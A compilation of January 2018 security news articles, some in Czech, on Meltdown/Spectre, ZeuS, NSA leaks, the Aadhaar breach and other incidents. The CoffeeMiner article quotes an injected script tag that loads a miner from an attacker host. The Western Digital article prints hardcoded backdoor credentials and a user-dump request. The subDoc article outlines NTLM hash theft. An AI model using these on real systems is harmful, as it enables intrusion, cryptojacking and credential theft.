The chipmaker has provided few details, but claims it has been working with ARM and others to assess the impact of the flaws. Mitigations have been developed and Qualcomm is in the process of incorporating them into impacted products.

“We are in the process of deploying these mitigations to our customers and encourage people to update their devices when patches become available,” the company stated.

Qualcomm’s processors, used in devices from several major vendors, include CPU, GPU, modem, audio, and camera components. Some of the systems rely on ARM CPU cores that have been confirmed to be affected by the Spectre (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754) vulnerabilities.

For example, the Snapdragon 653, 652 and 650 platforms use ARM Cortex-A72 processors, which ARM says are vulnerable to both Spectre exploits and a variant of the Meltdown attack. Moreover, the Snapdragon 845 mobile platform, which Qualcomm unveiled just a few weeks ago, uses a customized version of the Cortex-A75, which is also vulnerable to both Spectre and Meltdown attacks.

Qualcomm is not the only vendor using ARM technology in its products. Apple, whose A-series system-on-a-chip (SoC) also uses ARM processing cores, confirmed that some of its devices are affected.

Raspberry Pis also use ARM cores, but the Raspberry Pi Foundation announced that the models found in its devices – specifically ARM1176, Cortex-A7, and Cortex-A53 – are not impacted by Spectre or Meltdown.

The Meltdown and Spectre attacks allow malicious applications to bypass memory isolation mechanisms and access potentially sensitive data, including passwords, photos, documents, emails, and data from instant messaging apps.

Billions of devices using Intel, AMD and ARM processors are affected and researchers believe attacks are not easy to detect. Experts are concerned that we may soon witness remote attacks.

Attacks can be prevented using kernel page table isolation (KPTI) and a mitigation named Retpoline developed by researchers at Google. Intel, Apple, Microsoft, Google, Amazon and others have already started rolling out patches and workarounds.

However, the mitigations can introduce performance penalties of up to 30 percent for affected processors. While Intel said regular users should not notice any difference and several tech giants claimed they had not seen any meaningful performance impact, some AWS customers have reported problems, and tests conducted by Red Hat showed penalties of up to 19% in the case of operations involving highly cached random memory.


ZeuS Variant Abuses Legitimate Developer’s Website
8.1.2018 securityweek
Virus
The official website of Ukraine-based accounting software developer Crystal Finance Millennium (CFM) was abused for the distribution of a variant of the ZeuS banking Trojan, Talos reports.

The vector is similar to that used in the NotPetya attack in the summer of 2017, when a malicious actor abused the update server of tax software company M.E.Doc to distribute the destructive wiper.

Unlike the NotPetya attack, however, the distribution the ZeuS variant didn’t leverage a compromised server. Instead, the attack relied on accounting software maker CFM's website being used to distribute malware fetched by downloaders delivered as attachments in an email spam campaign.

The attack happened in August 2016, when information on the malware infection process were made public. Now, Talos has decided to share details on the scope of the attack and associated victims, including the geographic regions affected, based on information the company gathered after it managed to sinkhole command and control (C&C) domains.

The spam emails used in this attack contained a ZIP archive with a JavaScript file inside, which acted as a downloader. One of the domains used to host the malware payload was associated with CFM's website, which has been also observed distributing PSCrypt ransomware, the researchers say.

The malware used in this attack reused code from the version 2.0.8.9 of the ZeuS banking Trojan, which was leaked in 2011 and already spawned numerous other threats.

The malware would first check whether it runs in a virtualized sandbox environment and would enter an infinite sleep function if virtualization was detected. If not, it would then move to achieve persistence by creating a registry entry to ensure execution at system startup.

After infection, the malware attempts to connect to different C&C servers, one of which hadn’t been registered when Talos first started investigating the attack. The researchers then registered the domain, which provided them with insight into the malware’s C&C communications.

Talos discovered that most of the systems beaconing to the sinkhole server were located in Ukraine, with the United States emerging as the second most affected country. They also found out that PJSC Ukrtelecom, a company governed by the Ministry of Transportation and Communications in Ukraine, was the most affected ISP.

A total of 11,925,626 beacons from 3,165 unique IP addresses were logged by the sinkhole server, the researchers reveal.

“Attackers are increasingly attempting to abuse the trust relationship between organizations and their trusted software manufacturers as a means of obtaining a foothold within the environments they are targeting. As organizations deploy more effective security controls to protect their network environments attackers are continuing to refine their methodologies,” Talos concluded.


US National Security Agency Chief to Retire
8.1.2018 securityweek BigBrothers
National Security Agency Director Admiral Mike Rogers, the US signals intelligence czar, plans to retire within months after a four-year term scarred by damaging leaks, US intelligence sources confirmed Friday.

Rogers, who has led the NSA and its sister agency, the US Cyber Command, for four years, told staff in an internal letter Friday that he would depart in the spring, with his replacement to be nominated by President Donald Trump this month.

Named to the position in April 2014 by President Barack Obama, Rogers, 58, has almost completed one year under Trump, who has repeatedly delivered withering criticism of the US intelligence community.

Rogers was one of the four US security chiefs who presented a damning report to Trump on January 6, 2017 saying that Russians had interfered in the 2016 presidential election to boost his candidacy.

Trump has ever since refused to concede that conclusion, and Rogers is the only official who attended the meeting who kept his job through Trump's first year.

Besides keeping up US electronic spying, he has also spearheaded the country's ability to conduct offensive cyber operations, via the Cyber Command, a Pentagon unit.

And he has struggled to deal with the leak of ultra-secret NSA hacking tools, some of which are believed to have fallen into the hands of Russians.

Two former NSA hackers have agreed to plead guilty in recent months to charges of removing classified NSA materials to their homes, but neither has been accused of deliberate leaks.

According to a Washington Post report earlier this week, the NSA's 21,000-strong staff is facing a rapid turnover due to unhappiness with a Rogers-led reorganization and poor pay compared to the private sector.


NSA Contractor Pleads Guilty in Embarrassing Leak Case
8.1.2018 securityweek BigBrothers
A former contractor for the US National Security Agency's elite hacking group has agreed to plead guilty to removing classified documents in a case that highlighted a series of disastrous leaks of top-secret NSA materials.

Harold Martin, who reportedly worked for an NSA unit focused on hacking into target computer systems around the world, will plead guilty to one of 20 counts against him with the aim of concluding a 15-month-old case couched in deep secrecy, according to court documents filed late Wednesday.

The indictment filed on February 8, 2017 accused Martin of hoarding an estimated 50 terabytes of NSA data and documents in his home and car over a 20-year period. The material reportedly included sensitive digital tools for hacking foreign governments' computers.

His arrest in late 2016 followed the NSA's discovery that a batch of its hacking tools had fallen into the hands of a still-mysterious group called the Shadow Brokers, which offered them for sale online and also released some for free.

At least publicly, Martin has not been accused of responsibility for any NSA leaks.

In December, Nghia Hoang Pho, 67, a 10-year veteran of the NSA's Tailored Access Operations hacking unit, was charged with and agreed to plead guilty to one count of removing and retaining top-secret documents from the agency.

Vietnam-born Pho also had taken home highly classified NSA materials and programs.

According to The New York Times, apparent Russian hackers broke into his personal computer to steal the files, accessing them via Pho's use of Kaspersky software.

But that case also has not been linked to the Shadow Brokers theft.

Those leaks, and others from the Central Intelligence Agency, have hobbled the US spy agencies' abilities to hack into the computer systems of foreign governments and other espionage targets, according to intelligence experts.

Martin will officially submit his plea on January 22, according to court filings. He faces up to 10 years in jail and a maximum fine of $250,000.

Sentencing won't take place until the 19 other charges are resolved -- an indication that the government, while entertaining his single-count plea, is not completely satisfied that Martin's actions were harmless.


Meltdown a Spectre ohrožují i Apple

8.1.2018 SecurityWorld Apple
Společnost Apple uvádí, že aktuální kauza problémových čipů se týká také jejích produktů – iPhonů, iPadů i Maců.

Bezpečnostní slabiny procesorových čipů označené jako Meltdown a Spectre vyšly najevo tento týden. Závažná hrozba se týká potenciálně miliard počítačů, chytrých telefonů i tabletů s čipy od Intelu, AMD i ARM, nově potvrzená jsou tedy i zařízení od Applu. Společnost ale rovnou uvedla, že už vydala patche, které mají riziko hrozby zmírnit, a také to, že nemá zprávy o tom, že by na jejích zařízeních došlo ke zneužití tohoto bugu. Doporučila však svým zákazníkům, aby jakýkoliv software stahovali výhradně z důvěryhodných zdrojů a vyhýbali se škodlivým aplikacím.

„Hrozba se týká všech Mac systémů a zařízení s iOS, o zneužití slabiny však od našich zákazníků žádné informace nemáme,“ uvádí Apple. „Problém se týká všech moderních procesorů a tedy téměř všech počítačových zařízení a operačních systémů.“ Jedinou výjimku dle společnosti představují Apple Watch, kterých se Meltdown netýká. Patche proti Spectre ve formě aktualizace pro prohlížeč Safari by měly být vydány „v nejbližších dnech“.

Google a Microsoft se ke kauze vyjádřili už dříve. Uživatelé Androidu jsou podle Googlu v bezpečí, jestliže mají stažené poslední bezpečnostní aktualizace. Microsoft většinu svých služeb už též záplatoval, uživatelé Windows by však měli před instalací systémových patchů pro jistotu aktualizovat antivirové programy třetích stran.

Americký úřad pro kybernetickou a informační bezpečnost původně doporučil hardwarovou výměnu procesorů, později však své doporučení upravil pouze na nezbytnou aktualizaci softwaru.


Hackers Already Targeting Pyeongchang Olympics: Researchers
7.1.2018 securityweek Hacking
Hackers have already begun targeting the Pyeongchang Olympic Games with malware-infected emails which may be aimed at stealing passwords or financial information, researchers said Saturday.

The security firm McAfee said in a report that several organizations associated with the Olympics had received the malicious email with the primary target being groups affiliated with ice hockey.

"The majority of these organizations (targeted) had some association with the Olympics, either in providing infrastructure or in a supporting role," the McAfee report said. "The attackers appear to be casting a wide net with this campaign."

In the attacks, which began as early as December 22, emails were "spoofed" to make them appear to come from South Korea's National Counter-Terrorism Center, which was in the process of conducting antiterror drills in the region in preparation for the Games.

McAfee said the emails came in fact from an address in Singapore, and instructed the readers to open a text document in Korean.

The document was titled "Organized by Ministry of Agriculture and Forestry and Pyeongchang Winter Olympics," according to the report.

The malware in some cases was hidden in text, and later in an image -- a technique known as steganography, according to McAfee.

"Based on our analysis, this implant establishes an encrypted channel to the attacker's server, likely giving the attacker the ability to execute commands on the victim's machine and to install additional malware," McAfee said.

McAfee said it expects more attacks of this nature, echoing warnings last year from University of California researchers of increasing targeting of sporting events.

"With the upcoming Olympics, we expect to see an increase in cyberattacks using Olympics-related themes," the McAfee report said.

"In similar past cases, the victims were targeted for their passwords and financial information."


A new stack-based overflow vulnerability discovered in AMD CPUs
7.1.2018 securityaffairs
Vulnerebility

Google expert discovered a new stack-based overflow vulnerability in AMD CPUs that could be exploited via crafted EK certificates,
Chip manufacturers are in the tempest, while media are continues sharing news about the Meltdown and Spectre attacks, the security researcher at Google’s cloud security team Cfir Cohen disclosed a stack-based overflow vulnerability in the fTMP of AMD’s Platform Security Processor (PSP).

The vulnerability affects 64-bit x86 processors, the AMD PSP provides administrative functions similar to the Intel Management Engine.

The fTMP is the firmware implementation of the Trusted Platform Module that is an international standard for a secure cryptoprocessor, The TPM is a dedicated microcontroller designed to secure hardware by integrating cryptographic keys into devices.

Cohen revealed that he reported the vulnerability to AMD in September, the manufacturer apparently had developed a patch by December 7. After the 90-day disclosure window, Google decided to publicly disclose the details of the vulnerability because AMD did not take any action to solve the problem.

“Through manual static analysis, we’ve found a stack-based overflow in the function EkCheckCurrentCert. This function is called from TPM2_CreatePrimary with user controlled data – a DER encoded [6] endorsement key (EK) certificate stored in the NV storage. A TLV (type-length-value) structure is parsed and copied on to the parent stack frame. Unfortunately, there are missing bounds checks, and a specially crafted certificate can lead to a stack overflow:” reads the security advisory.

“A firmware update emerged for some AMD chips in mid-December, with an option to at least partially disable the PSP. However, a spokesperson for the tech giant said on Friday this week that the above fTMP issue will be addressed in an update due out this month, January 2018.”

Cohen explained that missing bounds checks while managing a TLV (type-length-value) structure are the root cause of a stack overflow.

The vulnerability requests the physical access as a prerequisite, the expert noted that the PSP doesn’t implement common exploit mitigation techniques such as stack cookies, No-eXecute stack, or ASLR.

amd

The flaw is very hard to exploit as confirmed by an AMD spokesperson to The Register.

“an attacker would first have to gain access to the motherboard and then modify SPI-Flash before the issue could be exploited. But given those conditions, the attacker would have access to the information protected by the TPM, such as cryptographic keys.” said the AMD spokesperson.

AMD plans to address the vulnerability for a limited number of firmware versions, the security updates will be available later this month.


Cisco is going to release security patches for Meltdown and Spectre attacks
7.1.2018 securityaffairs
Vulnerebility

Cisco is going to release security patches for Meltdown and Spectre attacks, the company is currently investigating its entire products portfolio.
Cisco published a security advisory on the CPU Side-Channel information disclosure vulnerabilities that are exploited in the Spectre and Meltdown attacks and announced it is going to release security updates to protect its customers.

Switchzilla announced it will release software updates that address these flaws.

In a statement, Cisco highlighted that the majority of its products are closed systems, this means that it is impossible for an attacker to run custom code on the device. However, the company confirmed that the underlying CPU and OS combination in some products could open the devices to the attacks.

“The first two vulnerabilities, CVE-2017-5753 and CVE-2017-5715, are collectively known as Spectre, the third vulnerability, CVE-2017-5754, is known as Meltdown. The vulnerabilities are all variants of the same attack and differ in the way the speculative execution is exploited.” reads the advisory published by CISCO.
“In order to exploit any of these vulnerabilities, an attacker must be able to run crafted code on an affected device. Although, the underlying CPU and OS combination in a product may be affected by these vulnerabilities, the majority of Cisco products are closed systems that do not allow customers to run custom code on the device, and thus are not vulnerable.”

According to Cisco, only devices that allow the customer to execute their customized code side-by-side with the Cisco code on the same microprocessor are at risk.

Let’s consider for example the case of a Cisco product running on a virtualized environment, if the virtual machine is vulnerable the overall system is exposed to the attacks.

“A Cisco product that may be deployed as a virtual machine or a container, even while not being directly affected by any of these vulnerabilities, could be targeted by such attacks if the hosting environment is vulnerable.” continues the advisory.

“Cisco recommends customers harden their virtual environment and to ensure that all security updates are installed.”

The company is currently investigating its product portfolio searching for vulnerable devices.


CoffeeMiner – Hacking WiFi networks to mine cryptocurrencies
7.1.2018 securityaffairs Hacking

A developer published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks and mine cryptocurrencies.
The spike in the values of Bitcoin is attracting the interest of crooks that are adopting any method to steal crypto wallets or computational resources from the victims.

A developer named Arnau has published a proof-of-concept project dubbed CoffeeMiner for hacking public Wi-Fi networks to inject crypto-mining code into connected browsing sessions, an ingenious method to rapidly monetize illegal efforts.

The experts explained that his project was inspired by the Starbucks case where hackers hijacked laptops connected to the WiFi network to use the devices computing power to mine cryptocurrency.

Arnau explained how to power a MITM (Man(Person)-In-The-Middle) attack to inject some javascript in the html pages accessed by the connected users, in this way all the devices connected to a WiFi network are forced to be mine a cryptocurrency.

The CoffeeMiner works by spoofing Address Resolution Protocol (ARP) messages on a local area network in order to intercept unencrypted traffic from other devices on the network.

The MiTM attack is conducted by using software called mitmproxy that allows to inject the following line of HTML code into unencrypted traffic related to the content requested by other users on the networks:

<script src="http://httpserverIP:8000/script.js" type="text/javascript"></script>
“mitmproxy is a software tool that allows us to analyze the traffic that goes through a host, and allows to edit that traffic. In our case, we will use it to inject the javascript into the html pages.” wrote Arnau.

“To make the process more more clean, we will only inject one line of code into the html pages. And will be that line of html code that will call to the javascript cryptocurrency miner.”

When the user’s browser loads the pages with the injected code it runs the JavaScript and abuses CPU time to generate Monero using CoinHive‘s crypto-mining software.

Arnau set up VirtualBox machine to demonstrate the attack, and also published a couple of PoC video for the attack in a virtualized environment and in a real world WiFi network:

 

The CoffeeMiner version published by the researcher doesn’t work with HTTPS, but the limitation could be bypassed by addition sslstrip.

“Another further feature, could be adding sslstrip, to make sure the injection also in the websites that the user can request over HTTPS.” concluded the researcher.

Arnau published the code of the CoffeeMiner project on GitHub.


Critical Unpatched Flaws Disclosed In Western Digital 'My Cloud' Storage Devices
6.1.2018 thehackernews
Vulnerebility

Security researchers have discovered several severe vulnerabilities and a secret hard-coded backdoor in Western Digital's My Cloud NAS devices that could allow remote attackers to gain unrestricted root access to the device.
Western Digital's My Cloud (WDMyCloud) is one of the most popular network-attached storage devices which is being used by individuals and businesses to host their files, and automatically backup and sync them with various cloud and web-based services.
The device lets users not only share files in a home network, but the private cloud feature also allows them to access their data from anywhere at any time.
Since these devices have been designed to be connected over the Internet, the hardcoded backdoor would leave user data open to hackers.
GulfTech research and development team has recently published an advisory detailing a hardcoded backdoor and several vulnerabilities it found in WD My Cloud storage devices that could allow remote attackers to inject their own commands and upload and download sensitive files without permission.
Noteworthy, James Bercegay of GulfTech contacted the vendor and reported the issues in June last year. The vendor confirmed the vulnerabilities and requested a period of 90 days until full disclosure.
On 3rd January (that's almost after 180 days), GulfTech publicly disclosed the details of the vulnerabilities, which are still unpatched.
Unrestricted File Upload Flaw Leads to Remote Exploitation
As the name suggests, this vulnerability allows a remote attacker to upload an arbitrary file to the server running on the internet-connected vulnerable storage devices.
The vulnerability resides in "multi_uploadify.php" script due to the wrong implementation of gethostbyaddr() PHP function by the developers.
This vulnerability can also be easily exploited to gain a remote shell as root. For this, all an attacker has to do is send a post request containing a file to upload using the parameter Filedata[0]—a location for the file to be uploaded to which is specified within the "folder" parameter, and a fake "Host" header.
The researcher has also written a Metasploit module to exploit this vulnerability.
"The [metasploit] module will use this vulnerability to upload a PHP webshell to the "/var/www/" directory. Once uploaded, the webshell can be executed by requesting a URI pointing to the backdoor, and thus triggering the payload," the researcher writes.
Hard Coded Backdoor Leads to Remote Exploitation
Researchers also found the existence of a "classic backdoor"—with admin username "mydlinkBRionyg" and password "abc12345cba," which is hardcoded into the binary and cannot be changed.
So, anyone can just log into WD My Cloud devices with these credentials.
Also, using this backdoor access, anyone can access the buggy code which is vulnerable to command injection and spawn a root shell.
"The triviality of exploiting this issues makes it very dangerous, and even wormable," the researcher notes. "Not only that, but users locked to a LAN are not safe either."
"An attacker could literally take over your WDMyCloud by just having you visit a website where an embedded iframe or img tag make a request to the vulnerable device using one of the many predictable default hostnames for the WDMyCloud such as 'wdmycloud' and 'wdmycloudmirror' etc."
Other Vulnerabilities in Western Digital's My Cloud
Besides these two above-mentioned critical vulnerabilities, researchers also reported some other below-explained important flaws:
Cross-site request forgery:
Due to no real XSRF protection within the WD My Cloud web interface, any malicious site can potentially make a victim's web browser connect to a My Cloud device on the network and compromise it.
Simply visiting a booby-trapped website would be enough to lose control of your My Cloud device.
Command injection:
In March last year, a member of the Exploitee.rs team discovered several command injection issues within the WD My Cloud devices, which can be combined with the XSRF flaw to gain complete control (root access) of the affected device.
Unfortunately, the GulfTech team also uncovered a few command injection flaws.
Denial of Service:
Researchers also found that since any unauthenticated user can set the global language preferences for the entire storage device and all of its users, it is possible for an attacker to abuse this functionality to cause a DoS condition to the web interface.
Information disclosure:
According to researchers, it is possible for an attacker to dump a list of all users, including detailed user information without requiring any authentication, by simply making use of a simple request to the web server like this: GET /api/2.1/rest/users? HTTP/1.1
Affected My Cloud Firmware Versions and Models
Western Digital's My Cloud and My Cloud Mirror firmware version 2.30.165 and earlier are affected by all above-reported vulnerabilities.
Affected device models include My Cloud Gen 2, My Cloud PR2100, My Cloud PR4100, My Cloud EX2 Ultra, My Cloud EX2, My Cloud EX4, My Cloud EX2100, My Cloud EX4100, My Cloud DL2100 and My Cloud DL4100.
Metasploit modules for all the vulnerabilities have been released online.


Bezpečnostní chyby v procesorech Intel otevírají dveře útočníkům

6.1.2018 SecurityWorld Hardware
Před nedávnem odhalená chyba se týká velké části dosud užívaných čipů, sahá přibližně do posledních deseti let. Na opravě se podle Intelu a dalších zúčastněných firem již pracuje, některé aktualizace na hlavní operační systémy jsou již dostupné. Zprávu původně přinesl server The Register.

Ve zveřejněné zprávě Intel přibližuje rozsah škod a také opravuje některé první informace, které se dostaly na internet. Popisuje, že zneužití chyby má potenciál sbírat citlivá data z počítačů, ale že „nemá potenciál ničit, upravovat nebo mazat data“.

Zmiňuje, že zranitelnost není omezena pouze na produkty Intelu, jak původně média sdělovala. Podle analýz firmy jsou ohroženy procesory a operační systémy různých výrobců; v dokumentu se také píše o tom, že na opravě společnost spolupracuje i s AMD a ARM, tedy svými úhlavními konkurenty v oblasti procesorů.

To je však logický krok. Podobně masivní zranitelnost je špatná pro všechny a vyřešit ji je nutné co nejrychleji.

Brzké aktualizace slibuje Microsoft, Apple i některé linuxové distribuce; oprava zabraňující zneužití zranitelnosti s názvem Meltdown (o ní více na konci článku) vyšla 4. ledna pro Windows 10, dočkají se jí i Windows 7 a 8. Androidy s nejnovějšími bezpečnostními aktualizacemi jsou podle Googlu chráněny, stejně jako jeho webové služby; Chromebooky na aktualizaci teprve čekají. Prohlížeč Chrome se má opravy až dočkat 23. ledna.

Zda jsou ohroženy iPhony a iPady jasné není, laptopy a stolní PC Applu se však aktualizací dočkají. Cloudové služby pro podniky jako AWS nebo Google Cloud Platform jsou z většiny již chráněny, zbytek se oprav dočká brzy.

Spectre, druhý typ zranitelnosti, je údajně těžší na opravu a žádná dosud není všeobecně dostupná.

„Intel začal poskytovat softwarové a firmwarové aktualizace, které mají snížit účinek případného zneužití,“ píše firma. Dopady aktualizací na výkon zařízení by měly být podle firmy pro uživatele nepříliš významné, byť uznává, že závisí na konkrétním zařízení a na pracovním vytížení stroje.

Někteří experti však podle britského serveru BBC hovoří až o 30% zpomalení výkonu strojů.

Intel dále zmiňuje, že spolu s dalšími společnostmi chtěla o zranitelnosti referovat příští týden, až budou k dispozici dodatečné aktualizace; média jej však předběhla. O chybě se podle informací BBC vědělo přinejmenším šest měsíců.

To je poměrně neobvyklá situace – zjištěné bezpečnostní problémy se standardně nejprve řeší v soukromí mezi společnostmi, kterých se zranitelnost týká, a až pak se se vším jde na světlo světa. Jde o ochranné opatření, aby zločinci neměli čas zranitelnost zneužití.

Ten však nyní mají, pokud tedy přijdou na to, o jakou zranitelnost se vlastně jedná. To zatím naštěstí není přesně známo, byť již zranitelnost byla rozdělena na dva různé typy: Meltdown („roztavení“) a Spectre („přízrak“)

Meltdown se dotýká laptopů, stolních počítačů a internetových serverů s čipy Intelu; Spectre je pak problémem pro čipy všech tří hlavních výrobců a je hrozbou pro smartphony, tablety i počítače.

Dosah obou zranitelností by byl v případě zneužití drastický, dosahoval by více než 90 % stolních počítačů a laptopů a značného množství dalších elektronických zařízení.

Zločinci by měli možnost přečíst si data uložená v počítači, získat by mohli například informace o heslech nebo údajích kreditní karty.


Hackerský útok se nedá vyloučit, experti budou během voleb v pohotovosti

6.1.2018 Novinky/Bezpečnost  BigBrother

Brněnský úřad pro kybernetickou bezpečnost bude v době konání prezidentských voleb v polovině ledna v pohotovosti. K zásahu bude připraveno až 25 odborníků. Mluvčí úřadu Radek Holý řekl, že se nedá vyloučit další hackerský útok. Takový atak po ukončení sněmovních voleb loni v říjnu způsobil výpadky volebních webů Českého statistického úřadu (ČSÚ) a vyšetřuje ho policie.

Národní úřad pro kybernetickou a informační bezpečnost (NÚKIB) funguje od loňského léta, mimo jiné zajišťuje podporu v případě kybernetických útoků. „Spolupráce se statistickým úřadem funguje už od předchozích voleb, připravujeme se společně na to, že se i u těchto voleb může objevit něco podobného. Že někdo něco může jen vyzkoušet nebo může mít nějaké nekalé úmysly," uvedl Holý.

Odborníci a analytici úřadu budou v pohotovosti a propojeni se statistickým úřadem, ministerstvem zahraničí i ministerstvem vnitra, stejně jako u předchozích voleb. V momentě, kdy statistický úřad či nějaký jeho partner nahlásí, že se děje něco nestandardního, úřad bude k řešení problému nápomocný.

Jako když se jede s autem do servisu
„Odhadujeme, k jakým útokům může dojít, o možnostech víme od našich národních partnerů i od těch zahraničních. Útočník je ale vždy o krok či dva napřed. Nejdříve se musí zjistit, že útok probíhá, analyzovat ho a teprve poté se rozhodnout, jaké kroky vůči danému útoku podniknout," uvedl Holý.

Podle něj je to podobné, jako když člověk jede s autem do servisu. Nejprve se na diagnostice zjišťuje, kde je problém, a teprve pak se navrhuje řešení. „Záleží na spoustě parametrů. Někdy útok zachytíte přímo, je viditelný, jindy to může trvat déle," řekl mluvčí.

Hackeři útočili v době voleb už loni, tehdy se zaměřili na weby ČSÚ. Kvůli hackerskému útoku byly stránky volby.cz a volbyhned.cz nedostupné zhruba 2,5 hodiny. Šlo o tzv. DDoS útok (Distributed Denial of Service). Ten má vždy stejný scénář, stovky tisíc počítačů začnou přistupovat v jeden okamžik na konkrétní server. Ten zpravidla nezvládne tak vysoké množství požadavků zpracovat a spadne. Pro běžné uživatele se takto napadená webová stránka tváří jako nedostupná.

Policie se případem stále zabývá, útočníky se však zatím nepodařilo dopadnout.


Data breach of the Aadhaar biometric system poses a serious risk for 1 Billion Indian residents
6.1.2018 securityaffairs Incindent

The Tribune announced to have “purchased” a service that provided it an unrestricted access to the residents’ records in the Aadhaar system.
According to The Tribune, hackers have breached the Unique Identification Authority of India’s Aadhaar biometric system and gained access to personally identifiable information (i.e. names, addresses, phone numbers) of more than 1 billion Indian residents.
The Tribune announced to have “purchased” a service being offered by anonymous sellers over WhatsApp that provided it an unrestricted access to details for any individual whose data are stored in the Aadhaar system.
Attackers offered a portal to access Indian citizen data by knowing the Aadhaar user’s ID number. The service allowed the journalist to retrieve the resident’s name, address, postal code, photo, phone number, and email address, by providing the Aadhaar ID.

The hackers are offering the access to the portal for 500 rupees and are charging an additional 300 rupees for an application that allows printing a Aadhaar card.

“Today, The Tribune “purchased” a service being offered by anonymous sellers over WhatsApp that provided unrestricted access to details for any of the more than 1 billion Aadhaar numbers created in India thus far.” states The Tribune.

“It took just Rs 500, paid through Paytm, and 10 minutes in which an “agent” of the group running the racket created a “gateway” for this correspondent and gave a login ID and password. Lo and behold, you could enter any Aadhaar number in the portal, and instantly get all particulars that an individual may have submitted to the UIDAI (Unique Identification Authority of India), including name, address, postal code (PIN), photo, phone number and email.”

The Unique Identification Authority of India denies that Aadhaar system has been breached, but The Tribune revealed that when contacted, UIDAI officials in Chandigarh expressed shock over the full data being accessed, and admitted it seemed to be a major national security breach.

“Except the Director-General and I, no third person in Punjab should have a login access to our official portal. Anyone else having access is illegal, and is a major national security breach.” Sanjay Jindal, Additional Director-General, UIDAI Regional Centre, Chandigarh told The Tribune.

Aadhaar%20system

According to the investigation conducted by The Tribune, the breach could have involved lakh village-level enterprise (VLE) operators hired by the Ministry of Electronics and Information Technology (ME&IT) under the Common Service Centres Scheme (CSCS) across India, offering them access to UIDAI data.

CSCS operators were initially tasked with making Aadhaar cards across India, but later this function was restricted to post offices and designated banks.

More than one lakh VLEs are now suspected to have gained this illegal access to UIDAI data to provide “Aadhaar services” to common people for a charge, including the printing of Aadhaar cards.


Intel releases patches to mitigate Meltdown and Spectre attacks
6.1.2018 securityaffairs
Vulnerebility

Meltdown and Spectre attacks – According to Intel, by the end of the next week, the company will have issued security patches for more than 90% of chips commercialized in the past 5 years.
White hat hackers from Google Project Zero this week disclosed the details of Meltdown and Spectre attacks targeting CPUs from major manufacturers, including Intel, AMD, and ARM.

The expert devised two attacks dubbed Meltdown (CVE-2017-5754) and Spectre (CVE-2017-5753 and CVE-2017-5715), which could be conducted to sensitive data processed by the CPU.

Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.

To protect systems from bot Meltdown and Spectre attacks it is possible to implement the hardening technique known as kernel page table isolation (KPTI). The technique allows isolating kernel space from user space memory.

Intel confirmed that system manufacturers have been provided firmware and software updates that neutralize both Meltdown and Spectre attacks for chips launched in the last five years.

Customers have to wait that system manufacturers will distribute the security patches for their affected products.

According to Intel, by the end of the next week, the company will have issued security patches for more than 90% of chips commercialized in the past 5 years.

“Intel has developed and is rapidly issuing updates for all types of Intel-based computer systems — including personal computers and servers — that render those systems immune from both exploits (referred to as “Spectre” and “Meltdown”) reported by Google Project Zero.” reads the press release published by Intel.

“Intel has already issued updates for the majority of processor products introduced within the past five years. By the end of next week, Intel expects to have issued updates for more than 90 percent of processor products introduced within the past five years.”

intel chip

Experts speculate security patches could have a significant effect on the performance of the affected products, but Intel pointed out that average users will not notice any difference.

“Intel continues to believe that the performance impact of these updates is highly workload-dependent and, for the average computer user, should not be significant and will be mitigated over time.” continues Intel.

“While on some discrete workloads the performance impact from the software updates may initially be higher, additional post-deployment identification, testing and improvement of the software updates should mitigate that impact.”

Intel confirmed that extensive testing conducted by tech giants (Apple, Amazon, Google, and Microsoft) to assess any impact on system performance from security updates did not reveal negative effects.

Researchers from Google Project Zero proposed as mitigation strategy a technique named Retpoline.

“In response to the vulnerabilities that were discovered we developed a novel mitigation called “Retpoline” — a binary modification technique that protects against “branch target injection” attacks. We shared Retpoline with our industry partners and have deployed it on Google’s systems, where we have observed negligible impact on performance.” wrote Google.
“In addition, we have deployed Kernel Page Table Isolation (KPTI) — a general purpose technique for better protecting sensitive information in memory from other software running on a machine — to the entire fleet of Google Linux production servers that support all of our products, including Search, Gmail, YouTube, and Google Cloud Platform.”


Microsoft Word subDoc Feature Allows Password Theft
5.1.2018 securityweek Hacking
A feature in Microsoft Word that allows for the loading of sub-documents from a master document can be abused by attackers to steal a user’s credentials, according to Rhino Security Labs.

Dubbed subDoc, the feature was designed to load a document into the body of another document, so as to include information from one document into the other, while also allowing for the information to be edited and viewed on its own.

According to Rhino Security, the feature can also be used to load remote (Internet-hosted) subDoc files into the host document, thus allowing for malicious abuse in certain situations.

The feature, Rhino's researchers explain, is similar to attachedTemplate, another Office feature that can be abused by attackers for malicious purposes. The method allows the creation of malicious documents that would open an authentication prompt in the Windows style once the intended victim opens them, thus enabling the attacker to harvest credentials remotely.

“We determined, after testing in our sandbox environment, that abusing the subDoc method would allow us to do the same thing as the attachedTemplate method,” Rhino Security’s Hector Monsegur explains.

The researcher also points out that some organizations are not filtering egress SMB requests, meaning that they would leak the NTLMv2 (session protocol) hash in the initial SMB request.

To exploit the feature, Rhino Security created a document opening a subDoc external resource using a Universal Naming Convention (UNC) path (a means of connecting to servers and workstations without specifying a drive) that points to a destination they would control.

This allowed them to load the Responder to listen for incoming SMB requests and collect the NTLMv2 hashes. Available on GitHub, Responder is a LLMNR, NBT-NS and MDNS poisoner designed to answer to File Server Service request, which is for SMB, and remain stealthy on the network.

“The attack process for this would be to send a tainted document out to several targets while running Responder server on associated C&C server. After targets open the document, we intercept the respective hashes, crack them using hashcat and use our newly found credentials for lateral movement across the target network,” Monsegur explains.

When the document is opened, subDoc automatically attempts to load and provides the user with a link instead of the would-be document. However, user interaction with the link isn’t required for the payload to execute, the researcher says. The link can also be hidden from the user, so that they wouldn’t detect the malicious intent.

The attack, the researcher points out, isn’t detected by popular anti-virus companies, mainly because the subDoc feature hasn’t been recognized publicly as an attack vector for malicious actions.

The security researcher also published an open source tool designed to generate a Word subDoc for a user-defined URL and also to integrate it into a user-specified ‘parent’ Word doc. Dubbed Subdoc Injector, the tool is available on GitHub.

“Office has a myriad of loosely-documented features that have yet to be explored. As more research goes into these functions, more vulnerabilities and abusable functions will likely be discovered, making the situation difficult for defenders to protect their systems,” Monsegur notes.


Industrial Firms Increasingly Hit With Targeted Attacks: Survey
5.1.2018 securityweek
Attack
An increasing number of companies in the industrial sector have experienced a targeted attack, according to a survey conducted by Kaspersky Lab and B2B International.

As part of its 2017 IT Security Risks Survey, Kaspersky talked to more than 5,200 representatives of small, medium and large businesses in 29 countries about IT security and the incidents they deal with.

